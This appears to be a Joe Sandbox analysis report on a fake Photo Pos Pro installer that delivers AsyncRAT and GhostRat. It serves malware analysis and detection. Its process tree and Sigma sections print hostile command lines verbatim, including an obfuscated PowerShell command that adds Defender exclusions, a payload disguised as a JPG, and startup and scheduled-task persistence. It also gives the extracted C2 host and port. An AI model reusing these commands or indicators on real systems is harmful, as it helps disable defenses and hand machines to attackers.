Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PhotoPosPro4_SetUp.exe

Overview

General Information

Sample name:PhotoPosPro4_SetUp.exe
Analysis ID:1622285
MD5:f51198eabbefd977f6602b46fd623ce7
SHA1:a1871891ba4f07a98f52f01d951790be36d9a329
SHA256:5fca52ed49604e6d1e135d0d628e61e3cf257803642bef024e1cf21c77d63ad4
Tags:AsyncRATexeuser-aachum
Infos:

Detection

AsyncRAT, GhostRat
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected GhostRat
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Drops PE files to the startup folder
Drops VBS files to the startup folder
Drops executables to the windows directory (C:\Windows) and starts them
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the program root directory (C:\Program Files)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Always Install Elevated MSI Spawned Cmd And Powershell
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PhotoPosPro4_SetUp.exe (PID: 5012 cmdline: "C:\Users\user\Desktop\PhotoPosPro4_SetUp.exe" MD5: F51198EABBEFD977F6602B46FD623CE7)
    • msiexec.exe (PID: 6260 cmdline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo Pos Pro\Photo Pos Pro 4.12.43\install\56332C6\setup.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\PhotoPosPro4_SetUp.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1740326085 " MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 4888 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6624 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E1026CE2F66F23E6FD1ECE5A164EA903 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6976 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 87A1BFD8CF860810F3553F2BAA316D8B MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7344 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E5AA896F17CC944DC7763BCB0AD001B1 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • PhotoPosPro4_SetUp.exe (PID: 7384 cmdline: "C:\Program Files (x86)\PhotoPosPro4_SetUp.exe" MD5: F98A9A9B76CE259B52028A2167DA5E7E)
      • PhotoPosPro4_SetUp.exe_tmp.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exe" MD5: D806E1EC5B0437191B42B052F80FB069)
        • vcredist_x64.exe (PID: 2124 cmdline: "C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exe" /install /quiet /norestart MD5: 7492E87AEC4A8F14CB436E13BF1610DB)
          • vcredist_x64.exe (PID: 3104 cmdline: "C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\inst5429125\vcredist_x64.exe" -burn.filehandle.attached=544 -burn.filehandle.self=580 /install /quiet /norestart MD5: 2FEFBFB4025B3E8864D9B4050076A554)
        • PhotoPosPro_PreInstaller.exe (PID: 6584 cmdline: "C:\Users\user\AppData\Local\Temp\inst5429125\PhotoPosPro_PreInstaller.exe" MD5: DAA0D50BE08C3A6AACF3DD6FAAF0600A)
        • Photo Pos Pro 4.exe (PID: 7820 cmdline: "C:\Program Files\Photo Pos Pro 4\Photo Pos Pro 4.exe" MD5: 635DAD9DB1202FBA461D2174CF43D89F)
        • chrome.exe (PID: 6012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/cgi-bin/MainRouter1.aspx?NavigatationID=AfterInstallThankYouPage&Param1=PhotoPosPro MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 2792 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1908,i,17967751664096825877,3136884809953927408,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • MSID82B.tmp (PID: 7460 cmdline: "C:\Windows\Installer\MSID82B.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Program Files (x86)\cmd.bat" MD5: 74A4833CF5CD5396535B5F236569E0F2)
      • cmd.exe (PID: 7504 cmdline: "C:\Windows\System32\cmd.exe" /C ""C:\Program Files (x86)\cmd.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7556 cmdline: powershell.exe -Command "tar -xf 18.jpg -C $env:public" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • tar.exe (PID: 7676 cmdline: "C:\Windows\system32\tar.exe" -xf 18.jpg -C C:\Users\Public MD5: 3596DC15B6F6CBBB6EC8B143CBD57F24)
        • powershell.exe (PID: 7724 cmdline: powershell.exe -Command "Move-Item -Path '18.jpg' -Destination $env:public" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • wscript.exe (PID: 7872 cmdline: wscript.exe "C:\Users\Public\18.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • powershell.exe (PID: 7924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 8128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionProcess 'RegAsm.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • WmiPrvSE.exe (PID: 6936 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • LS.exe (PID: 5744 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe" MD5: 98B781C5C01E8C6137885766AE25318F)
              • RegAsm.exe (PID: 5816 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • svchost.exe (PID: 7176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ebghls.exe (PID: 7312 cmdline: C:\Users\user\AppData\Local\Temp\ebghls.exe MD5: 46441DA6848047284FDD6A2DFA19B802)
    • MSBuild.exe (PID: 5628 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • LS.exe (PID: 3900 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe" MD5: 98B781C5C01E8C6137885766AE25318F)
    • RegAsm.exe (PID: 4248 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 5408 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • wscript.exe (PID: 7404 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smcdll.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • smcdll.exe (PID: 5328 cmdline: "C:\Users\user\AppData\Local\smcdll.exe" MD5: 46441DA6848047284FDD6A2DFA19B802)
      • MSBuild.exe (PID: 1004 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration

Threatname: AsyncRAT

{"Server": "jojo.ath.cx", "Port": "1414", "Version": "| Edit 3LOSH RAT", "MutexName": "AsyncMutex_7SI8OkPne", "Autorun": "false", "Group": "true"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001D.00000002.3054270763.0000000003ADA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000028.00000002.2711123189.0000000003C05000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        00000028.00000002.2711123189.0000000003CE8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000028.00000002.2776743666.0000000005760000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 34 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            29.2.RegAsm.exe.3ada090.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              40.2.smcdll.exe.3ce8610.3.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                41.2.MSBuild.exe.800000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  41.2.MSBuild.exe.800000.0.unpackWindows_Trojan_Asyncrat_11a11ba1unknownunknown
                  • 0xc542:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
                  • 0xf438:$a2: Stub.exe
                  • 0xf4c8:$a2: Stub.exe
                  • 0x8fde:$a3: get_ActivatePong
                  • 0xc75a:$a4: vmware
                  • 0xc5d2:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
                  • 0x9ed9:$a6: get_SslClient
                  41.2.MSBuild.exe.800000.0.unpackrat_win_asyncratDetect AsyncRAT based on specific stringsSekoia.io
                  • 0x8fde:$str01: get_ActivatePong
                  • 0x9ed9:$str02: get_SslClient
                  • 0x9ef5:$str03: get_TcpClient
                  • 0x841e:$str04: get_SendSync
                  • 0x84cc:$str05: get_IsConnected
                  • 0x8d48:$str06: set_UseShellExecute
                  • 0xc868:$str07: Pastebin
                  • 0xdf00:$str08: Select * from AntivirusProduct
                  • 0xf438:$str09: Stub.exe
                  • 0xf4c8:$str09: Stub.exe
                  • 0xc652:$str10: timeout 3 > NUL
                  • 0xc542:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn
                  • 0xc5d2:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
                  Click to see the 26 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Execution of Powershell Script in Public Folder
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: wscript.exe "C:\Users\Public\18.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7872, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1, ProcessId: 7924, ProcessName: powershell.exe
                  Sigma detected: Potential PowerShell Command Line Obfuscation
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionProcess 'RegAsm.exe'" , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionProcess 'RegAsm.exe'" , CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7924, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionProcess 'RegAsm.exe'" , ProcessId: 8128, ProcessName: powershell.exe
                  Sigma detected: Script Interpreter Execution From Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: wscript.exe "C:\Users\Public\18.vbs" , CommandLine: wscript.exe "C:\Users\Public\18.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Program Files (x86)\cmd.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7504, ParentProcessName: cmd.exe, ProcessCommandLine: wscript.exe "C:\Users\Public\18.vbs" , ProcessId: 7872, ProcessName: wscript.exe
                  Sigma detected: Suspicious PowerShell Parameter Substring
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: wscript.exe "C:\Users\Public\18.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7872, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1, ProcessId: 7924, ProcessName: powershell.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: wscript.exe "C:\Users\Public\18.vbs" , CommandLine: wscript.exe "C:\Users\Public\18.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Program Files (x86)\cmd.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7504, ParentProcessName: cmd.exe, ProcessCommandLine: wscript.exe "C:\Users\Public\18.vbs" , ProcessId: 7872, ProcessName: wscript.exe
                  Sigma detected: Always Install Elevated MSI Spawned Cmd And Powershell
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C ""C:\Program Files (x86)\cmd.bat" ", CommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Program Files (x86)\cmd.bat" ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\Installer\MSID82B.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Program Files (x86)\cmd.bat", ParentImage: C:\Windows\Installer\MSID82B.tmp, ParentProcessId: 7460, ParentProcessName: MSID82B.tmp, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Program Files (x86)\cmd.bat" ", ProcessId: 7504, ProcessName: cmd.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: wscript.exe "C:\Users\Public\18.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7872, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -f C:\Users\Public\18.ps1, ProcessId: 7924, ProcessName: powershell.exe
                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7924, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe
                  Sigma detected: Startup Folder File Write
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7924, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: wscript.exe "C:\Users\Public\18.vbs" , CommandLine: wscript.exe "C:\Users\Public\18.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Program Files (x86)\cmd.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7504, ParentProcessName: cmd.exe, ProcessCommandLine: wscript.exe "C:\Users\Public\18.vbs" , ProcessId: 7872, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -Command "tar -xf 18.jpg -C $env:public" , CommandLine: powershell.exe -Command "tar -xf 18.jpg -C $env:public" , CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Program Files (x86)\cmd.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7504, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "tar -xf 18.jpg -C $env:public" , ProcessId: 7556, ProcessName: powershell.exe
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7176, ProcessName: svchost.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\ebghls.exe, ProcessId: 7312, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smcdll.vbs

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-23T16:58:58.462321+010020221121Exploit Kit Activity Detected192.168.2.4500402.19.100.239443TCP
                  2025-02-23T16:59:11.556808+010020221121Exploit Kit Activity Detected192.168.2.45021823.58.104.30443TCP
                  2025-02-23T16:59:14.816630+010020221121Exploit Kit Activity Detected192.168.2.450248104.119.108.27443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-23T16:58:59.376575+010020355951Domain Observed Used for C2 Detected157.20.182.161414192.168.2.450054TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-23T16:58:59.376575+010020356071Domain Observed Used for C2 Detected157.20.182.161414192.168.2.450054TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-23T16:58:59.376575+010028424781Malware Command and Control Activity Detected157.20.182.161414192.168.2.450054TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "jojo.ath.cx", "Port": "1414", "Version": "| Edit 3LOSH RAT", "MutexName": "AsyncMutex_7SI8OkPne", "Autorun": "false", "Group": "true"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\ebghls.exeReversingLabs: Detection: 68%
                  Source: C:\Users\user\AppData\Local\smcdll.exeReversingLabs: Detection: 68%
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LS.exeReversingLabs: Detection: 83%
                  Multi AV Scanner detection for submitted file
                  Source: PhotoPosPro4_SetUp.exeVirustotal: Detection: 9%Perma Link
                  Sample uses string decryption to hide its real strings
                  Source: 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmpString decryptor: 1414
                  Source: 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmpString decryptor: jojo.ath.cx
                  Source: 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmpString decryptor: | Edit 3LOSH RAT
                  Source: 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmpString decryptor: false
                  Source: 00000025.00000002.2982455411.0000000002911000.00000004.00000800.00020000.00000000.sdmpString decryptor: AsyncMutex_7SI8OkPne
